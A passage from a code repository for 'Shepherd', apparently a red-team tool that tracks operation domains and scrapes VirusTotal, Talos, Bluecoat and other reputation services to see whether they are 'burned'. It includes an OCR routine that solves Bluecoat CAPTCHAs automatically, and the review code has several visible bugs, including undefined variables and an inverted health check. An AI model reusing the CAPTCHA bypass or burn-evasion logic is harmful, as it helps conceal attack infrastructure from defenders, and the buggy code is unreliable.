services such as Pushover are being considered.\n\n### Database Setup\n\nNext, the database tables must be migrated. This configures all of Shepherd's database models from the code in models.py to actual tables:\n\nTo setup the database run: `python3 manage.py migrate`\n\nAssuming that completed successfully, you need to pre-populate a few of Shepherd's database models with some data. These are just some basic domain statuses and project types. You can add your own as desired later.\n\nTo initiate settings run: `python3 manage.py loaddata catalog/fixtures/initial_values.json`\n\n### Start Django\n\nA super user must now be created to access the admin panel and create new users and groups. This is the administrator of Shepherd, so set a strong password and document it in a password vault somewhere.\n\nTo create a superuser run: `python manage.py createsuperuser`\n\nFinally, try starting the server and accessing the admin panel.\n\nTo start the server run: `python3 manage.py runserver`\n\nVisit SERVER_IP:8000/admin to view the admin panel and login using the superuser.\n\n### Creating New Users\n\nCreate your users using the admin panel. Filling out a complete profile is recommended.\n\nIn cases where Shepherd records a user action the usernames are used rather than first or last names, but Shepherd does display the user's full name in the corner if it is available. Also, usernames are weirdly case sensitive, so all lowercase is recommended to avoid confusion later.\n\nEmail addresses are not important at the present time, but this will change. Shepherd will use email addresses for password recovery, but the email server is not baked into Shepherd right now. Emails will just appear in the terminal and that is where the user or an administrator can get their password reset link.\n\nIn the future, email addresses will be displayed as a means of contacting the operator using a particular domain for domain and project questions. Email may also ne used to send notifications.\n\n### Creating New Groups\n\nGroups are a good way to organize user permissions. Shepherd will make a couple of functions available to a \"Senior Operators\" group, including editing a domain's information. To use this functionality create two groups named \"Operators\" and \"Senior Operators\" in the admin panel.\n\nOnly mark users as \"Staff\" if you want them to be able to access the Django admin panel. It is better to leave the admin panel alone for day-to-day work and it should not be required except to fix a problem or directly edit the database for some reason, so users do not require this access.\n\n### Start Django Q and Redis\n\nOnce you are ready to actually use Shepherd start your Redis server. You also need to start Django Q's `qcluster` which will need to be done using another terminal window with manage.py, just like starting the server.\n\nRun this: `python3 manage.py qcluster`\n\nIf Redis is running on a different server, you changed the port, or made some other modification, you will need to update the Redis configuration in settings.py. You could also switch to a different broker if you already have some other broker setup and would prefer to use it for Shepherd. Check Django Q's documentation to make the changes in settings.py to switch to Rabbit MQ, Amazon SQS, or whatever else you might be using.\n\n### Schedule Tasks\n\nVisit the Django Q database from the admin panel and check the Scheduled tasks. You may wish to create a scheduled task to automatically release domains at the end of a project. Shepherd has a task for this, `tasks.release_domains`, which you can schedule whenever you please, like every morning at 01:00.\n\n## Notes on Health\n\nShepherd grades a domain's health as Healthy or Burned. Health is reported as an overall health grade and a separate grade for the domain's DNS. You will almost certainly see a `Healthy` domain with questionable DNS. This is not something to be worried about without some human investigation. The DNS is based on VirusTotal's passive DNS report and checking to see if the IP addresses have appeared in any threat reports. If you bought an expired domain it's not at all strange to learn it once pointed at a cloud IP address that was flagged for something naughty at some point.\n\nCheck to see if the IP addresses in question are yours. If they are not then you can probably ignore this. If the IP address was flagged very recently, like just before you bought the domain, then that may be a concern because the domain may be flagged for recent malicious activity. There's a lot of \"maybes\" here because this is very much an imperfect grade.\n\nIn general, focus on the overall health status (based on categories) and just use the passive DNS information and flags to help with manual analysis of your domains.\n"
},
{
"alpha_fraction": 0.4889705777168274,
"alphanum_fraction": 0.49816176295280457,
"avg_line_length": 22.65217399597168,
"blob_id": "07fef115c281a49f07e1f409542e285dd79ce789",
"content_id": "dcca4dba60b6cbd60301b4946e8c863f6684d526",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 544,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 23,
"path": "/catalog/templates/catalog/history_form.html",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "{% extends \"base_generic.html\" %}\n\n{% block pagetitle %}Manage History Entry{% endblock %}\n\n{% block content %}\n <style>\n th {\n background-color: #fafafa;\n color: black;\n }\n th:hover {background-color:#f5f5f5;}\n </style>\n <h2>Enter Project Details:</h2>\n <br />\n <form action=\"\" method=\"post\">\n {% csrf_token %}\n <table>\n {{ form.as_table }}\n </table>\n <br />\n <input type=\"submit\" class=\"button\" value=\"Submit\">\n </form>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.597562313079834,
"alphanum_fraction": 0.5978887677192688,
"avg_line_length": 46.117950439453125,
"blob_id": "28c618e5963cb67a658bb6dbc7ce052977e39ec9",
"content_id": "5c9317087531cd2305227e2187f49b60d371b16f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9189,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 195,
"path": "/tasks.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains tasks to be run using Django Q and Redis.\"\"\"\n\n# Import the catalog application's models and settings\nfrom django.conf import settings\nfrom catalog.models import Domain, History, DomainStatus, HealthStatus\n\n# Import custom modules\nfrom modules.review import DomainReview\nfrom modules.dns import DNSCollector\n\n# Import Python libraries for various things\nimport json\nimport requests\nimport datetime\nfrom datetime import date\n\n\ndef send_slack_msg(message):\n \"\"\"Accepts message text and sends it to Slack. This requires Slack settings and a webhook be\n configured in the application's settings.\n\n Parameters:\n\n message A string to be sent as the Slack message\n \"\"\"\n try:\n enable_slack = settings.SLACK_CONFIG['enable_slack']\n except:\n enable_slack = False\n if enable_slack:\n try:\n slack_emoji = settings.SLACK_CONFIG['slack_emoji']\n slack_username = settings.SLACK_CONFIG['slack_username']\n slack_webhook_url = settings.SLACK_CONFIG['slack_webhook_url']\n slack_alert_target = settings.SLACK_CONFIG['slack_alert_target']\n slack_channel = settings.SLACK_CONFIG['slack_channel']\n slack_capable = True\n except Exception as error:\n slack_capable = False\n\n if slack_capable:\n message = slack_alert_target + ' ' + message\n slack_data = {\n 'username': slack_username, \n 'icon_emoji': slack_emoji, \n 'channel': slack_channel, \n 'text': message\n }\n response = requests.post(slack_webhook_url, data=json.dumps(slack_data), headers={'Content-Type':'application/json'})\n if response.status_code != 200:\n print('[!] Request to slack returned an error %s, the response is:\\n%s' % (response.status_code, response.text))\n\ndef send_slack_complete_msg(task):\n \"\"\"Function to send a Slack message for a task. Meant to be used as a hook for an async_task().\"\"\"\n if task.success:\n send_slack_msg('Task {} has completed its run. It completed successfully with no additional result data.'.format(task.name))\n else:\n if task.result:\n send_slack_msg('Task {} failed with this result: {}'.format(task.name, task.result))\n else:\n send_slack_msg('Task {} failed with no result/error data. Check the Django Q admin panel.'.format(task.name))\n\ndef release_domains(no_action=False):\n \"\"\"Pull all domains currently checked-out in Shepherd and update the status to Available if the\n project's end date is today or in the past.\n\n Parameters:\n\n no_action Defaults to False. Set to True to take no action and just return a list\n of domains that should be released now.\n \"\"\"\n domains_to_be_released = []\n # First get all domains set to `Unavailable`\n queryset = Domain.objects.filter(domain_status__domain_status='Unavailable')\n # Go through each `Unavailable` domain and check it against projects\n for domain in queryset:\n # Get all projects for the domain\n project_queryset = History.objects.filter(domain__name=domain.name)\n release_me = True\n # Check each project's end date to determine if all are in the past or not\n for project in project_queryset:\n if date.today() < project.end_date:\n release_me = False\n # If release_me is still true, release the domain\n if release_me:\n domains_to_be_released.append(domain)\n # Check no_action and just return list if it is set to True\n if no_action:\n return domains_to_be_released\n else:\n for domain in domains_to_be_released:\n print('Releasing {} back into the pool.'.format(domain.name))\n domain_instance = Domain.objects.get(name=domain.name)\n domain_instance.domain_status = DomainStatus.objects.get(domain_status='Available')\n domain_instance.save()\n return domains_to_be_released\n\ndef check_domains():\n \"\"\"Initiate a check of all domains in the Domain model and update each domain status.\"\"\"\n # Get all domains from the database\n domain_queryset = Domain.objects.all()\n domain_review = DomainReview(domain_queryset)\n lab_results = domain_review.check_domain_status()\n for domain in lab_results:\n try:\n # The `domain` is already a Domain object so this query might be unnecessary :thinking_emoji:\n domain_instance = Domain.objects.get(name=domain.name)\n # Flip status if a domain has been flagged as burned\n if lab_results[domain]['burned']:\n domain_instance.health_status = HealthStatus.objects.get(health_status='Burned')\n domain_instance.domain_status = DomainStatus.objects.get(domain_status='Burned')\n message = '*{}* has been flagged as burned because: {}'.format(domain.name, lab_results[domain]['burned_explanation'])\n if lab_results[domain]['categories']['bad']:\n message = message + ' (Bad categories: {})'.format(lab_results[domain]['categories']['bad'])\n send_slack_msg(message)\n # Update other fields for the domain object\n domain_instance.health_dns = lab_results[domain]['health_dns']\n domain_instance.burned_explanation = lab_results[domain]['burned_explanation']\n domain_instance.all_cat = lab_results[domain]['categories']['all']\n domain_instance.talos_cat = lab_results[domain]['categories']['talos']\n domain_instance.opendns_cat = lab_results[domain]['categories']['opendns']\n domain_instance.bluecoat_cat = lab_results[domain]['categories']['bluecoat']\n domain_instance.ibm_xforce_cat = lab_results[domain]['categories']['xforce']\n domain_instance.trendmicro_cat = lab_results[domain]['categories']['trendmicro']\n domain_instance.fortiguard_cat = lab_results[domain]['categories']['fortiguard']\n domain_instance.mx_toolbox_status = lab_results[domain]['categories']['mxtoolbox']\n domain_instance.save()\n except Exception as error:\n print('[!] Error updating \"{}\". Error: {}'.format(domain.name, error))\n pass\n\ndef update_dns():\n \"\"\"Initiate a check of all domains in the Domain model and update each domain's DNS records.\"\"\"\n dns_toolkit = DNSCollector()\n # Get all domains from the database\n domain_queryset = Domain.objects.all()\n for domain in domain_queryset:\n # Get each type of DNS record for the domain\n try:\n try:\n temp = []\n ns_records_list = dns_toolkit.get_dns_record(domain.name, 'NS')\n for rdata in ns_records_list.response.answer:\n for item in rdata.items:\n temp.append(item.to_text())\n ns_records = ', '.join(x.strip('.') for x in temp)\n except:\n ns_records = 'None'\n try:\n temp = []\n a_records = dns_toolkit.get_dns_record(domain.name, 'A')\n for rdata in a_records.response.answer:\n for item in rdata.items:\n temp.append(item.to_text())\n a_records = ', '.join(temp)\n except:\n a_records = None\n try:\n mx_records = dns_toolkit.return_dns_record_list(domain.name, 'MX')\n except:\n mx_records = None\n try:\n txt_records = dns_toolkit.return_dns_record_list(domain.name, 'TXT')\n except:\n txt_records = None\n try:\n soa_records = dns_toolkit.return_dns_record_list(domain.name, 'SOA')\n except:\n soa_records = None\n try:\n dmarc_record = dns_toolkit.return_dns_record_list('_dmarc.' + domain.name, 'TXT')\n except:\n dmarc_record = None\n # Assemble the string to be stored in the database\n dns_records_string = ''\n if ns_records:\n dns_records_string += 'NS: %s ::: ' % ns_records\n if a_records:\n dns_records_string += 'A: %s ::: ' % a_records\n if mx_records:\n dns_records_string += 'MX: %s ::: ' % mx_records\n if dmarc_record:\n dns_records_string += 'DMARC: %s ::: ' % dmarc_record\n else:\n dns_records_string += 'DMARC: MX configured without a DMARC record! ::: '\n if txt_records:\n dns_records_string += 'TXT: %s ::: ' % txt_records\n if soa_records:\n dns_records_string += 'SOA: %s ::: ' % soa_records\n except:\n dns_records_string = 'None'\n # Look-up the individual domain and save the new record string for that domain\n domain_instance = Domain.objects.get(name=domain.name)\n domain_instance.dns_record = dns_records_string\n domain_instance.save()\n\n"
},
{
"alpha_fraction": 0.7470398545265198,
"alphanum_fraction": 0.7491926550865173,
"avg_line_length": 34.730770111083984,
"blob_id": "df34587365067a5b344683d215f1bee8d01fc0cb",
"content_id": "0d74061f6556bc1de1d9722a92a50cc6a66703be",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 929,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 26,
"path": "/shepherd/urls.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains all of the URL mappings for the main Shepherd application. The `urlpatterns` list\nroutes URLs to views. For more information please see:\n\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\n\"\"\"\n\nfrom django.urls import path\nfrom django.urls import include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('catalog/', include('catalog.urls')),\n path('', RedirectView.as_view(url='/catalog/', permanent=True)),\n]\n\n# Use static() to add url mapping to serve static files during development (only)\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n# Add Django site authentication urls (for login, logout, password management)\nurlpatterns += [\n path('accounts/', include('django.contrib.auth.urls')),\n]\n"
},
{
"alpha_fraction": 0.5657722353935242,
"alphanum_fraction": 0.5719793438911438,
"avg_line_length": 51.82688522338867,
"blob_id": "ea033c271a16dcb56437c31a55057c1d65e2fd29",
"content_id": "299a377cabdb92bd2a14558487cb17345a7124e9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25938,
"license_type": "permissive",
"max_line_length": 154,
"num_lines": 491,
"path": "/modules/review.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"This class accepts a list of domains from a provided Django query set and then\nreviews each one to ensure it is ready to be used for an op. This involves checking to see if\nthe domain is properly categorized, the domain has not been flagged in VirusTotal or tagged\nwith a bad category, and the domain is not blacklisted for spam.\n\nDomainReview checks the domain against VirusTotal, Cisco Talos, Bluecoat, IBM X-Force, Fortiguard, \nTrendMicro, OpeDNS, and MXToolbox. Domains will also be checked against malwaredomains.com's list\nof reported domains.\n\"\"\"\n\nimport os\nimport re\nimport csv\nimport sys\nimport json\nimport shutil\nimport base64\nfrom time import sleep\n\nfrom django.conf import settings\nfrom catalog.models import Domain\n\nimport requests\nimport pytesseract\nfrom PIL import Image\nfrom lxml import etree\nfrom lxml import objectify\nfrom cymon import Cymon\nfrom bs4 import BeautifulSoup\n\n\n# Disable requests warnings for things like disabling certificate checking\nrequests.packages.urllib3.disable_warnings()\n\n\nclass DomainReview(object):\n \"\"\"Class to pull a list of registered domains belonging to a Namecheap account and then check\n the web reputation of each domain.\n \"\"\"\n # API endpoints\n malwaredomains_url = 'http://mirror1.malwaredomains.com/files/justdomains'\n virustotal_domain_report_uri = 'https://www.virustotal.com/vtapi/v2/domain/report?apikey={}&domain={}'\n # Categories we don't want to see\n # These are lowercase to avoid inconsistencies with how each service might return the categories\n blacklisted = ['phishing', 'web ads/analytics', 'suspicious', 'shopping', 'placeholders', \n 'pornography', 'spam', 'gambling', 'scam/questionable/illegal', \n 'malicious sources/malnets']\n # Variables for web browsing\n useragent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'\n session = requests.Session()\n\n def __init__(self, domain_queryset):\n \"\"\"Everything that needs to be setup when a new DomainReview object is created goes here.\"\"\"\n # Domain query results from the Django models\n self.domain_queryset = domain_queryset\n # Try to get the sleep time configured in settings\n try:\n self.request_delay = settings.DOMAINCHECK_CONFIG['sleep_time']\n except Exception as error:\n self.request_delay = 20\n \n try:\n self.virustotal_api_key = settings.DOMAINCHECK_CONFIG['virustotal_api_key']\n except Exception as error:\n self.virustotal_api_key = None\n print('[!] A VirusTotal API key could not be pulled from settings.py. Review settings to perform VirusTotal checks.')\n exit()\n\n def check_virustotal(self, domain, ignore_case=False):\n \"\"\"Check the provided domain name with VirusTotal. VirusTotal's API is case sensitive, so\n the domain will be converted to lowercase by default. This can be disabled using the\n ignore_case parameter.\n\n This uses the VirusTotal /domain/report endpoint:\n\n https://developers.virustotal.com/v2.0/reference#domain-report\n \"\"\"\n if self.virustotal_api_key:\n if not ignore_case:\n domain = domain.lower()\n try:\n req = self.session.get(self.virustotal_domain_report_uri.format(self.virustotal_api_key, domain))\n vt_data = req.json()\n except:\n vt_data = None\n return vt_data\n else:\n return None\n\n def check_talos(self, domain):\n \"\"\"Check the provided domain's category as determined by Cisco Talos.\"\"\"\n categories = []\n cisco_talos_uri = 'https://talosintelligence.com/sb_api/query_lookup?query=%2Fapi%2Fv2%2Fdetails%2Fdomain%2F&query_entry={}&offset=0&order=ip+asc'\n headers = {'User-Agent': self.useragent, \n 'Referer': 'https://www.talosintelligence.com/reputation_center/lookup?search=' + domain}\n try:\n req = self.session.get(cisco_talos_uri.format(domain), headers=headers)\n if req.ok:\n json_data = req.json()\n category = json_data['category']\n if category:\n categories.append(json_data['category']['description'])\n else:\n categories.append('Uncategorized')\n else:\n print('[!] Cisco Talos check request failed. Talos did not return a 200 response.')\n print('L.. Request returned status \"{}\"'.format(req.status_code))\n except Exception as error:\n print('[!] Cisco Talos request failed: {}'.format(error))\n return categories\n\n def check_ibm_xforce(self, domain):\n \"\"\"Check the provided domain's category as determined by IBM X-Force.\"\"\"\n categories = []\n xforce_uri = 'https://exchange.xforce.ibmcloud.com/url/{}'.format(domain)\n headers = {'User-Agent': self.useragent, \n 'Accept': 'application/json, text/plain, */*', \n 'x-ui': 'XFE', \n 'Origin': xforce_uri, \n 'Referer': xforce_uri}\n xforce_api_uri = 'https://api.xforce.ibmcloud.com/url/{}'.format(domain)\n try:\n req = self.session.get(xforce_api_uri, headers=headers, verify=False)\n if req.ok:\n response = req.json()\n if not response['result']['cats']:\n categories.append('Uncategorized')\n else:\n temp = ''\n # Parse all dictionary keys and append to single string to get Category names\n for key in response['result']['cats']:\n categories.append(key)\n # IBM X-Force returns a 404 with {\"error\":\"Not found.\"} if the domain is unknown\n elif req.status_code == 404:\n categories.append('Unknown')\n else:\n print('[!] IBM X-Force check request failed. X-Force did not return a 200 response.')\n print('L.. Request returned status \"{}\"'.format(req.status_code))\n except:\n print('[!] IBM X-Force request failed: {}'.format(error))\n return categories\n\n def check_fortiguard(self, domain):\n \"\"\"Check the provided domain's category as determined by Fortiguard Webfilter.\"\"\"\n categories = []\n fortiguard_uri = 'https://fortiguard.com/webfilter?q=' + domain\n headers = {'User-Agent': self.useragent, \n 'Origin': 'https://fortiguard.com', \n 'Referer': 'https://fortiguard.com/webfilter'}\n try:\n req = self.session.get(fortiguard_uri, headers=headers)\n if req.ok:\n \"\"\"\n Example HTML result:\n <div class=\"well\">\n <div class=\"row\">\n <div class=\"col-md-9 col-sm-12\">\n <h4 class=\"info_title\">Category: Education</h4>\n \"\"\"\n # TODO: Might be best to BS4 for this rather than regex\n cat = re.findall('Category: (.*?)\" />', req.text, re.DOTALL)\n categories.append(cat[0])\n else:\n print('[!] Fortiguard check request failed. Fortiguard did not return a 200 response.')\n print('L.. Request returned status \"{}\"'.format(req.status_code))\n except Exception as error:\n print('[!] Fortiguard request failed: {}'.format(error))\n return categories\n\n def check_bluecoat(self, domain, ocr=True):\n \"\"\"Check the provided domain's category as determined by Symantec Bluecoat.\"\"\"\n categories = []\n bluecoart_uri = 'https://sitereview.bluecoat.com/resource/lookup'\n post_data = {'url': domain, 'captcha': ''}\n headers = {'User-Agent': self.useragent, \n 'Content-Type': 'application/json; charset=UTF-8', \n 'Referer': 'https://sitereview.bluecoat.com/lookup'}\n try:\n response = self.session.post(bluecoart_uri, headers=headers, json=post_data, verify=False)\n root = etree.fromstring(response.text)\n for node in root.xpath('//CategorizationResult//categorization//categorization//name'):\n categories.append(node.text)\n if 'captcha' in categories:\n if ocr:\n # This request is also performed by a browser, but is not needed for our purposes\n print('[*] Received a CAPTCHA challenge from Bluecoat...')\n captcha = self.solve_captcha('https://sitereview.bluecoat.com/resource/captcha.jpg', self.session)\n if captcha:\n b64captcha = base64.urlsafe_b64encode(captcha.encode('utf-8')).decode('utf-8')\n # Send CAPTCHA solution via GET since inclusion with the domain categorization request doesn't work anymore\n print('[*] Submitting an OCRed CAPTCHA text to Bluecoat...')\n captcha_solution_url = 'https://sitereview.bluecoat.com/resource/captcha-request/{0}'.format(b64captcha)\n response = self.session.get(url=captcha_solution_url, headers=headers, verify=False)\n # Try the categorization request again\n response = self.session.post(url, headers=headers, json=postData, verify=False)\n response_json = json.loads(response.text)\n if 'errorType' in response_json:\n print('[!] CAPTCHA submission was apparently incorrect!')\n categories = response_json['errorType']\n else:\n print('[!] CAPTCHA submission was accepted!')\n categories = response_json['categorization'][0]['name']\n else:\n print('[!] Failed to solve BlueCoat CAPTCHA with OCR. Manually solve at: \"https://sitereview.bluecoat.com/sitereview.jsp\"')\n else:\n print('[!] Failed to solve BlueCoat CAPTCHA with OCR. Manually solve at: \"https://sitereview.bluecoat.com/sitereview.jsp\"')\n except Exception as error:\n print('[!] Bluecoat request failed: {0}'.format(error))\n return categories\n\n def solve_captcha(self, url, session):\n \"\"\"Solve a Bluecoat CAPTCHA for the provided session.\"\"\"\n # Downloads CAPTCHA image and saves to current directory for OCR with Tesseract\n # Returns CAPTCHA string or False if error occurred\n jpeg = 'captcha.jpg'\n headers = {'User-Agent':self.useragent}\n try:\n response = session.get(url=url, headers=headers, verify=False, stream=True)\n if response.status_code == 200:\n with open(jpeg, 'wb') as f:\n response.raw.decode_content = True\n shutil.copyfileobj(response.raw, f)\n else:\n print('[!] Failed to download the Bluecoat CAPTCHA.')\n return False\n # Perform basic OCR without additional image enhancement\n text = pytesseract.image_to_string(Image.open(jpeg))\n text = text.replace(\" \", \"\").replace(\"[\", \"l\").replace(\"'\", \"\")\n # Remove CAPTCHA file\n try:\n os.remove(jpeg)\n except OSError:\n pass\n return text\n except Exception as error:\n print('[!] Error processing the Bluecoat CAPTCHA.'.format(error))\n return False\n\n def check_mxtoolbox(self, domain):\n \"\"\"Check if the provided domain is blacklisted as spam as determined by MX Toolkit.\"\"\"\n issues = []\n mxtoolbox_url = 'https://mxtoolbox.com/Public/Tools/BrandReputation.aspx'\n headers = {'User-Agent': self.useragent, \n 'Origin': mxtoolbox_url, \n 'Referer': mxtoolbox_url} \n try:\n response = self.session.get(url=mxtoolbox_url, headers=headers)\n soup = BeautifulSoup(response.content, 'lxml')\n viewstate = soup.select('input[name=__VIEWSTATE]')[0]['value']\n viewstategenerator = soup.select('input[name=__VIEWSTATEGENERATOR]')[0]['value']\n eventvalidation = soup.select('input[name=__EVENTVALIDATION]')[0]['value']\n data = {\n '__EVENTTARGET': '', \n '__EVENTARGUMENT': '', \n '__VIEWSTATE': viewstate, \n '__VIEWSTATEGENERATOR': viewstategenerator, \n '__EVENTVALIDATION': eventvalidation, \n 'ctl00$ContentPlaceHolder1$brandReputationUrl': domain, \n 'ctl00$ContentPlaceHolder1$brandReputationDoLookup': 'Brand Reputation Lookup', \n 'ctl00$ucSignIn$hfRegCode': 'missing', \n 'ctl00$ucSignIn$hfRedirectSignUp': '/Public/Tools/BrandReputation.aspx', \n 'ctl00$ucSignIn$hfRedirectLogin': '', \n 'ctl00$ucSignIn$txtEmailAddress': '', \n 'ctl00$ucSignIn$cbNewAccount': 'cbNewAccount', \n 'ctl00$ucSignIn$txtFullName': '', \n 'ctl00$ucSignIn$txtModalNewPassword': '', \n 'ctl00$ucSignIn$txtPhone': '', \n 'ctl00$ucSignIn$txtCompanyName': '', \n 'ctl00$ucSignIn$drpTitle': '', \n 'ctl00$ucSignIn$txtTitleName': '', \n 'ctl00$ucSignIn$txtModalPassword': ''\n }\n response = self.session.post(url=mxtoolbox_url, headers=headers, data=data)\n soup = BeautifulSoup(response.content, 'lxml')\n if soup.select('div[id=ctl00_ContentPlaceHolder1_noIssuesFound]'):\n issues.append('No issues found')\n else:\n if soup.select('div[id=ctl00_ContentPlaceHolder1_googleSafeBrowsingIssuesFound]'):\n issues.append('Google SafeBrowsing Issues Found.')\n if soup.select('div[id=ctl00_ContentPlaceHolder1_phishTankIssuesFound]'):\n issues.append('PhishTank Issues Found')\n except Exception as error:\n print('[!] Error retrieving Google SafeBrowsing and PhishTank reputation!')\n return issues\n\n def check_cymon(self, target):\n \"\"\"Get reputation data from Cymon.io for target IP address. This returns two dictionaries\n for domains and security events.\n\n A Cymon API key is not required, but is recommended.\n \"\"\"\n try:\n req = self.session.get(url='https://cymon.io/' + target, verify=False)\n if req.status_code == 200:\n if 'IP Not Found' in req.text:\n return False\n else:\n return True\n else:\n return False\n except Exception:\n return False\n\n def check_opendns(self, domain):\n \"\"\"Check the provided domain's category as determined by the OpenDNS community.\"\"\"\n categories = []\n opendns_uri = 'https://domain.opendns.com/{}'\n headers = {'User-Agent':self.useragent}\n try:\n response = self.session.get(opendns_uri.format(domain), headers=headers, verify=False)\n soup = BeautifulSoup(response.content, 'lxml')\n tags = soup.find('span', {'class': 'normal'})\n if tags:\n categories = tags.text.strip().split(', ')\n else:\n categories.append('No Tags')\n except Exception as error:\n print('[!] OpenDNS request failed: {0}'.format(error))\n return categories\n\n def check_trendmicro(self, domain):\n \"\"\"Check the provided domain's category as determined by the Trend Micro.\"\"\"\n categories = []\n trendmicro_uri = 'https://global.sitesafety.trendmicro.com/'\n trendmicro_stage_1_uri = 'https://global.sitesafety.trendmicro.com/lib/idn.php'\n trendmicro_stage_2_uri = 'https://global.sitesafety.trendmicro.com/result.php'\n headers = {'User-Agent': self.useragent}\n headers_stage_1 = {\n 'Host': 'global.sitesafety.trendmicro.com', \n 'Accept': '*/*', \n 'Origin': 'https://global.sitesafety.trendmicro.com', \n 'X-Requested-With': 'XMLHttpRequest', \n 'User-Agent': self.useragent, \n 'Content-Type': 'application/x-www-form-urlencoded', \n 'Referer': 'https://global.sitesafety.trendmicro.com/index.php', \n 'Accept-Encoding': 'gzip, deflate', \n 'Accept-Language': 'en-US, en;q=0.9'\n }\n headers_stage_2 = {\n 'Origin': 'https://global.sitesafety.trendmicro.com', \n 'Content-Type': 'application/x-www-form-urlencoded', \n 'User-Agent': self.useragent, \n 'Accept': 'text/html, application/xhtml+xml, application/xml;q=0.9, image/webp, image/apng, */*;q=0.8', \n 'Referer': 'https://global.sitesafety.trendmicro.com/index.php', \n 'Accept-Encoding': 'gzip, deflate', \n 'Accept-Language': 'en-US, en;q=0.9'\n }\n data_stage_1 = {'url': domain}\n data_stage_2 = {'urlname': domain, \n 'getinfo': 'Check Now'\n }\n try:\n response = self.session.get(trendmicro_uri, headers=headers)\n response = self.session.post(trendmicro_stage_1_uri, headers=headers_stage_1, data=data_stage_1)\n response = self.session.post(trendmicro_stage_2_uri, headers=headers_stage_2, data=data_stage_2)\n # Check if session was redirected to /captcha.php\n if 'captcha' in response.url:\n print('[!] TrendMicro responded with a reCAPTCHA, so cannot proceed with TrendMicro.')\n print('L.. You can try solving it yourself: https://global.sitesafety.trendmicro.com/captcha.php')\n else:\n soup = BeautifulSoup(response.content, 'lxml')\n tags = soup.find('div', {'class': 'labeltitlesmallresult'})\n if tags:\n categories = tags.text.strip().split(', ')\n else:\n categories.append('Uncategorized')\n except Exception as error:\n print('[!] Trend Micro request failed: {0}'.format(error))\n return categories\n\n def download_malware_domains(self):\n \"\"\"Downloads the malwaredomains.com list of malicious domains.\"\"\"\n headers = {'User-Agent':self.useragent}\n response = self.session.get(url=self.malwaredomains_url, headers=headers, verify=False)\n malware_domains = response.text\n if response.status_code == 200:\n return malware_domains\n else:\n print('[!] Error reaching: {}, Status: {}'.format(self.malwaredomains_url, response.status_code))\n return None\n\n def check_domain_status(self):\n \"\"\"Check the status of each domain in the provided list collected from the Domain model.\n Each domain will be checked to ensure the domain is not flagged/blacklisted. A domain\n will be considered burned if VirusTotal returns detections for the domain or one of the\n domain's categories appears in the list of bad categories.\n\n VirusTotal allows 4 requests every 1 minute. A minimum of 20 seconds is recommended to\n allow for some consideration on the service.\n\n \"\"\"\n lab_results = {}\n malware_domains = self.download_malware_domains()\n for domain in self.domain_queryset:\n print('[+] Starting update of {}'.format(domain.name))\n burned_dns = False\n domain_categories = []\n # Sort the domain information from queryset\n domain_name = domain.name\n health = domain.health_status\n # Check if domain is known to be burned and skip it if so\n # This just saves time and operators can edit a domain and set status to `Healthy` as needed\n # The domain will be included in the next update after the edit\n if health != 'Healthy':\n burned = False\n else:\n burned = True\n if not burned:\n burned_explanations = []\n # Check if domain is flagged for malware\n if malware_domains:\n if domain_name in malware_domains:\n print('[!] {}: Identified as a known malware domain (malwaredomains.com)!'.format(domain_name))\n burned = True\n burned_explanations.append('Flagged by malwaredomains.com')\n # Check domain name with VirusTotal\n vt_results = self.check_virustotal(domain_name)\n if 'categories' in vt_results:\n domain_categories = vt_results['categories']\n # Check if VirusTotal has any detections for URLs or samples\n if 'detected_downloaded_samples' in vt_results:\n if len(vt_results['detected_downloaded_samples']) > 0:\n print('[!] {}: Identified as having a downloaded sample on VirusTotal!'.format(domain_name))\n burned = True\n burned_explanations.append('Tied to a VirusTotal detected malware sample')\n if 'detected_urls' in vt_results:\n if len(vt_results['detected_urls']) > 0:\n print('[!] {}: Identified as having a URL detection on VirusTotal!'.format(domain_name))\n burned = True\n burned_explanations.append('Tied to a VirusTotal detected URL')\n # Get passive DNS results from VirusTotal JSON\n ip_addresses = []\n if 'resolutions' in vt_results:\n for address in vt_results['resolutions']:\n ip_addresses.append({'address':address['ip_address'], 'timestamp':address['last_resolved'].split(' ')[0]})\n bad_addresses = []\n for address in ip_addresses:\n if self.check_cymon(address['address']):\n burned_dns = True\n bad_addresses.append(address['address'] + '/' + address['timestamp'])\n if burned_dns:\n print('[*] {}: Identified as pointing to suspect IP addresses (VirusTotal passive DNS).'.format(domain_name))\n health_dns = 'Flagged DNS ({})'.format(', '.join(bad_addresses))\n else:\n health_dns = \"Healthy\"\n # Collect categories from the other sources\n xforce_results = self.check_ibm_xforce(domain_name)\n domain_categories.extend(xforce_results)\n talos_results = self.check_talos(domain_name)\n domain_categories.extend(talos_results)\n bluecoat_results = self.check_bluecoat(domain_name)\n domain_categories.extend(bluecoat_results)\n fortiguard_results = self.check_fortiguard(domain_name)\n domain_categories.extend(fortiguard_results)\n opendns_results = self.check_opendns(domain_name)\n domain_categories.extend(opendns_results)\n trendmicro_results = self.check_trendmicro(domain_name)\n domain_categories.extend(trendmicro_results)\n mxtoolbox_results = self.check_mxtoolbox(domain_name)\n domain_categories.extend(domain_categories)\n # Make categories unique\n domain_categories 